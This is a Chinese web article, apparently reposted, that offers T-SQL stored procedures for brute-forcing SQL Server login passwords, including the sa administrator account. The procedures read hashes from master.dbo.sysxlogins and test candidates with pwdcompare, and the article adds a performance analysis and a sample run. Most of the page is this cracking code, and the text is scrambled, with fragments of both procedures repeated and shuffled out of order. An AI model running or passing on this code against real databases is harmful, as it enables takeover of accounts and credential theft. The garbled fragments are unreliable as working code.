SQL Server sa密码破解

日期:2020-04-29编辑作者:数据库

select @l=0 ,@s1='aa.c' ,@s2='cast(ASCII(aa.c) as varchar)' ,@s3=',#t aa' ,@stimes='1th,' + cast(@t as varchar(20)) + 'rows'

begin

if object_id(N'tempdb..#t') is not null drop table #t if object_id(N'tempdb..#pwd') is not null drop table #pwd

and name=isnull(@username,name)

declare @l int, @t bigint

where pwd.jm=0

if object_id(N'tempdb..#t') is not null drop table #t if object_id(N'tempdb..#pwd') is not null drop table #pwd

select name,password

declare @ss varchar(256) --select @ss= '123456789' select @ss= 'abcdefghijklmnopqrstuvwxyz' select @ss=@ss+ '`0123456789-=[];,./' select @ss=@ss+ '~!@#$%^&*()_+{}|:?' --select @ss=@ss+ 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'

where srvid is null

破解一个帐号的密码长度,破解时间和性能消耗,是以所有用于破解的字符长度为底,以密码长度为指数的指数函数,即:破解帐号个数 * 最长密码长度次方 主机最大性能:

')

下面是我修改后的代码:复制代码 代码如下:alter proc p_GetPassword2 @username sysname=null, --用户名,如果不指定,则列出所有用户 @pwdlen int=2 --要破解的密码的位数,默认是2位及以下的 as set nocount on

,pwd='+@s2+'

select name,password ,type=case when xstatus&2048=2048 then 1 else 0 end ,jm=case when password is null then 1 else 0 end ,pwdstr=cast('' as sysname) ,pwd=cast('' as varchar(8000)) ,times =cast('' as varchar(8000)) into #pwd from master.dbo.sysxlogins a where srvid is null and name=isnull(@username,name) declare @s1 varchar(8000),@s2 varchar(8000),@s3 varchar(8000), @stimes varchar(8000)

,pwdstr=cast('' as sysname)

原存储过程使用256个破解字符,理论上可以破解7位密码,即2567Max(bigint)。我修改的存储过程使用66个键盘常规字符,理论上可以破解10位密码,即6610Max(bigint)。如果知道密码是10个数字字符的组合,理论上可以破解19位密码,即1019Max(bigint)。

from #pwd
go
exec sp_password null,'s12',sa

用户名密码密码ASCII查询次数和行数b12349,50,511th,66rows;2th,4356rows;3th,287496rows

as

代码演示暴力破解MSSQL的帐号和密码,包括管理员帐号sa的密码。

set @pwdlen=case when isnull(@pwdlen,0)<1 then 1 else @pwdlen-1 end

一个SQL Server Sa密码破解的存储过程复制代码 代码如下:alter proc p_GetPassword @username sysname=null, --用户名,如果不指定,则列出所有用户 @pwdlen int=2 --要破解的密码的位数,默认是2位及以下的 as set @pwdlen=case when isnull(@pwdlen,0)1 then 1 else @pwdlen-1 end select top 255 id=identity(int,0,1) into #t from syscolumns alter table #t add constraint PK_#t primary key(id) select name,password ,type=case when xstatus&2048=2048 then 1 else 0 end ,jm=case when password is null then 1 else 0 end ,pwdstr=cast('' as sysname) ,pwd=cast('' as varchar(8000)) into #pwd from master.dbo.sysxlogins a where srvid is null and name=isnull(@username,name) declare @s1 varchar(8000),@s2 varchar(8000),@s3 varchar(8000) declare @l int select @l=0 ,@s1='char(aa.id)' ,@s2='cast(aa.id as varchar)' ,@s3=',#t aa' exec(' update pwd set jm=1,pwdstr='+@s1+' ,pwd='+@s2+' from #pwd pwd'+@s3+' where pwd.jm=0 and pwdcompare('+@s1+',pwd.password,pwd.type)=1 ') while exists(select 1 from #pwd where jm=0 and @l@pwdlen) begin select @l=@l+1 ,@s1=@s1+'+char('+char(@l/26+97)+char(@l%26+97)+'.id)' ,@s2=@s2+'+'',''+cast('+char(@l/26+97)+char(@l%26+97)+'.id as varchar)' ,@s3=@s3+',#t '+char(@l/26+97)+char(@l%26+97) exec(' update pwd set jm=1,pwdstr='+@s1+' ,pwd='+@s2+' from #pwd pwd'+@s3+' where pwd.jm=0 and pwdcompare('+@s1+',pwd.password,pwd.type)=1 ') end select 用户名=name,密码=pwdstr,密码ASCII=pwd from #pwd GO

exec('

create table #t(c char(1) not null) alter table #t add constraint PK_#t primary key CLUSTERED (c) declare @index int select @index=1 while (@index =len(@ss)) begin insert #t select SUBSTRING(@ss, @index, 1) select @index = @index +1 end

')

exec(' update pwd set jm=1,pwdstr='+@s1+' ,pwd='+@s2+' ,times='''+@stimes+''' from #pwd pwd'+@s3+' where pwd.jm=0 and pwdcompare('+@s1+',pwd.password,pwd.type)=1 ') end select 用户名=name,密码=pwdstr,密码ASCII=pwd, 查询次数和行数=times from #pwd

update pwd set jm=1,pwdstr='+@s1+'

exec(' update pwd set jm=1,pwdstr='+@s1+' ,pwd='+@s2+' from #pwd pwd'+@s3+' where pwd.jm=0 and pwdcompare('+@s1+',pwd.password,pwd.type)=1 ') while exists(select 1 from #pwd where jm=0 and @l@pwdlen) begin select @l=@l+1 select @t = count(1)*POWER(len(@ss),@l+1) from #pwd print @t

and pwdcompare('+@s1+',pwd.password,pwd.type)=1

性能分析:

@username sysname=null, --用户名,如果不指定,则列出所有用户

首先说说破解过程序核心思想,就是存储帐号密码的master.dbo.sysxlogins表和未公布的密码比较存储过程pwdcompare。经过一方分析,修改了部分代码,下面贴出修改前后的代码,

where pwd.jm=0

set @pwdlen=case when isnull(@pwdlen,0)1 then 1 else @pwdlen-1 end

exec('

select @t = count(1)*POWER(len(@ss),1) from #pwd

,@s2='cast(aa.id as varchar)'

本例以一个查询能查询bigint的最大值条记录9223372036854775807为限做为主机最大性能,来粗略计算破解性能。

into #pwd

我测试如下复制代码 代码如下:p_GetPassword2 'b', 6

declare @l int

select @s1=@s1+'+'+char(@l/26+97)+char(@l%26+97)+'.c' ,@s2=@s2+'+'',''+cast(ASCII('+char(@l/26+97)+char(@l%26+97)+'.c) as varchar)' ,@s3=@s3+',#t '+char(@l/26+97)+char(@l%26+97) ,@stimes=@stimes+';'+ cast(@l+1 as varchar(1)) + 'th,' + cast(@t as varchar(20)) + 'rows'

,@s1=@s1+'+char('+char(@l/26+97)+char(@l%26+97)+'.id)'

网上有SQL Server Sa密码破解的存储过程,方法就是暴力破解MSSQL的帐号和密码,包括管理员帐号sa的密码,下面我对其它的代码稍做修改,并进行了一些性能分析。

,@s3=',#t aa'

本文由www.129028.com金沙发布于数据库,转载请注明出处:SQL Server sa密码破解

关键词:

SQL Server 2000的安全配置

SQLserver2000数据库应用非常广泛,一旦出现安全问题,造成的损失往往难以估量!应提前预防,防患于未然。这里,我...

详细>>

如何查看某个查询用了多少TempDB空间www.129028.com金沙

DECLARE @read BIGINT, @write BIGINT; SELECT @read = SUM(num_of_bytes_read), @write = SUM(num_of_bytes_written) FROM tempdb.sys.database_files AS DBFJOI...

详细>>

浅析SQL语句中GROUP BY的用法

GROUP BY 是分组查询, 一般 GROUP BY 是和 聚合函数配合使用,你可以想想 你用了GROUP BY 按 ITEM.ITEMNUM这个字段分组,那其他字...

详细>>

微软总是试图使它的软件安装尽可能地简单顺www.129028.com金沙

如果你没有特意记录安装日期,那么有没有办法从SQL Server里查询到呢?想想我们在安装的时候,肯定会有Windows认证登...

详细>>